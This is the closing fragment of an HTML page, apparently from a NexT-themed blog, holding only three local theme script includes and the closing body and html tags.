<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
